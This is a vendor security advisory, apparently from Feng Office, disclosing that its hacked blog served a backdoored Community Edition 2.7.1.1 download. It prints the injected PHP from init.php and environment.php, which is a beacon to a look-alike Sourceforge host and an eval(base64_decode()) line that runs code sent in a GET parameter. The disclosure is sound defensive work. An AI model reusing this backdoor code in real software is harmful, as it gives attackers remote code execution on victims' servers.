Community EditionDevelopmentSecurity

Community Edition: please update your installation to the latest version. Version 2.7.1.1 could be infected

By 20 November, 2014June 14th, 2024No Comments

A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.

This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1

Affected installations

The link modified the download destination and inserted a local file to download an infected version 2.7.1.1 of the Community Edition.

Installations running a different version, or a 2.7.1.1 downloaded from Sourceforge are not affected.

Recommended Measures

The most effective way to be 100% sure is to download and update to the latest version.

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).

We have since removed all infected files from our website and resolved the Apache settings allowing the security exploit.

The infection was introduced on the files “init.php” and “environment/environment.php”, on line 22. The infected code looks like this:

In init.php:

file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {
if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
session_start(); // Start the session
}
}
file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
include_once ENVIRONMENT_PATH . '/classes/Env.class.php';
...
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

We would like to thank the two users who detected the issue and reported it to our team.

We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information; especially if your installation was affected.

Hopefully, we will handle it better if a similar attack happens again.